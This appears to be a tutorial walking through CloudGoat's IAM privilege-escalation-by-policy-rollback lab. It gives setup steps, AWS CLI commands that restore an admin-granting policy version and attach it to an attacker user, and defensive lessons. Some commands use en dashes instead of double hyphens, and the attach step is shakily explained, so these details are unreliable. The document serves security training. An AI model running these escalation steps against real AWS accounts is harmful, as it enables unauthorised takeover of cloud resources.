Introduction to CloudGoat: Vulnerable-by-Design AWS Security Training
Cloud security is essential to modern IT infrastructures, but understanding how attackers exploit cloud environments is key to implementing effective defenses. This is where CloudGoat comes in—a vulnerable-by-design AWS environment built for security training.
CloudGoat provides a range of scenarios that mimic real-world vulnerabilities, enabling users to learn and practice penetration testing in AWS safely. This guide focuses on one of its most engaging scenarios: IAM Privilege Escalation by Policy Rollback.
Setting Up Your CloudGoat Environment
Before diving into the scenario, setting up your environment is crucial. Here’s how to prepare CloudGoat:
1. Install Docker
Ensure you have Docker installed on your machine to run CloudGoat. Docker simplifies the setup by providing containerized environments.
2. Configure AWS CLI
Install and configure the AWS CLI with credentials and permissions to deploy CloudGoat resources in your AWS account.
aws configure
3. Set Up CloudGoat
Clone the CloudGoat repository:
git clone https://github.com/RhinoSecurityLabs/cloudgoat.git
cd cloudgoat
Install the required Python dependencies:
pip install -r requirements.txt
Configure your AWS profile within CloudGoat:
./cloudgoat.py config profile
4. Launch the Scenario
Activate the IAM Privilege Escalation scenario:
./cloudgoat.py create iam_privesc_by_rollback
Scenario: IAM Privilege Escalation by Policy Rollback
An attacker exploits misconfigured IAM policies to escalate their privileges in this scenario. The attacker starts with minimal permissions but identifies a vulnerability allowing them to roll back an IAM policy to a previous version with admin access.
Step-by-Step Exploitation: From Limited User to Admin Access
Step 1: Reconnaissance
- Use your limited credentials to query the existing IAM policies. Look for policies that allow the iam:ListPolicyVersions and iam:SetDefaultPolicyVersion actions.
- Check the policy version history to identify potentially exploitable previous versions.
aws iam list-policy-versions –policy-arn arn:aws:iam::123456789012:policy/ExamplePolicy
Step 2: Identify a Vulnerable Policy
Find a policy with a prior version granting AdministratorAccess.
Step 3: Roll Back the Policy
Using the SetDefaultPolicyVersion permission, revert the policy to the vulnerable version:
aws iam set-default-policy-version –policy-arn arn:aws:iam::123456789012:policy/ExamplePolicy –version-id v3
Step 4: Exploit Admin Privileges
Attach the reverted policy to your user, granting yourself admin access:
aws iam attach-user-policy –policy-arn arn:aws:iam::123456789012:policy/ExamplePolicy –user-name attacker-user
Step 5: Verify Admin Access
Execute admin-level commands to confirm privilege escalation.
Cleanup and Lessons Learned: Mitigating IAM Privilege Escalation Risks
Cleanup
Use CloudGoat to destroy the scenario resources:
./cloudgoat.py destroy iam_privesc_by_rollback
Lessons Learned
To prevent privilege escalation in AWS, implement these best practices:
- Least Privilege Principle: Grant only the permissions necessary for each role or user.
- Policy Version Management: Regularly review and delete outdated policy versions.
- Monitor IAM Activities: Use AWS CloudTrail to track IAM actions such as SetDefaultPolicyVersion.
- Implement MFA: Add an extra layer of security for administrative users.
- Use AWS Config Rules: Automate policy compliance checks.
Conclusion
Understanding IAM privilege escalation techniques, like the one explored here, helps organizations strengthen their AWS security posture. CloudGoat provides a safe and educational environment where you can learn about these vulnerabilities hands-on. By applying lessons from this scenario, you can effectively mitigate the risks of IAM privilege escalation.